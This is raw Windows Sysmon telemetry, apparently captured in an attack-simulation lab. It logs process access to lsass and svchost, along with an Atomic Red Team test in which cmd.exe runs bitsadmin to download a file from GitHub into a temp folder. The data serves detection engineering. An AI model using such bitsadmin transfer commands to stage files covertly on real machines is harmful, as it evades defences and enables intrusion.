21:49:24.539{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005917255Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.503{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005917254Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.467{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917253Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.467{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917252Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.466{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917251Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.466{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917250Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.466{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917249Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.465{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917248Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.465{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917247Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.465{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917246Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.464{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917245Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.464{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917244Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.464{896A638B-B5C8-6058-0B00-00000000AE01}6128092C:\Windows\system32\lsass.exe{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917243Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.455{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BF9F19B40229FAC476CB9831DCEC4CCE,SHA256=28F8EE40722441031B5ADC126E4EF69D71CCF7AA4C988CA4CAFB024290B56957,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005917242Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:49:24.440{896A638B-B5CB-6058-1600-00000000AE01}1308C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileNameGlobal\MMF_BITS169f85f9-b8f1-4e11-a2ca-8b953de4e095 23542300x80000000000000005917241Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.427{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=801E07D6002FA6B3F7B86D07A8E8EBE6,SHA256=F6A814DE6105C6D0D43255F7FE1EBF48598867A09CEEE520FE1FC1E199C7A875,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917240Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.423{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917239Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.420{896A638B-B5CB-6058-1600-00000000AE01}13087204C:\Windows\System32\svchost.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917238Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.420{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917237Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.397{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917236Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.395{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917235Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.394{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917234Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.394{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917233Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.394{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917232Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.394{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917231Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.394{896A638B-B3E4-605B-6E69-00000000AE01}75007396C:\Windows\system32\cmd.exe{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917230Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.384{896A638B-B3E4-605B-6F69-00000000AE01}932C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exeC:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Users\ADMINI~1\AppData\Local\Temp\2\Atomic-license.txt C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt %temp%\Atomic-license.txt" 10341000x80000000000000005917229Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:24.379{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E4-605B-6E69-00000000AE01}7500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917228Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 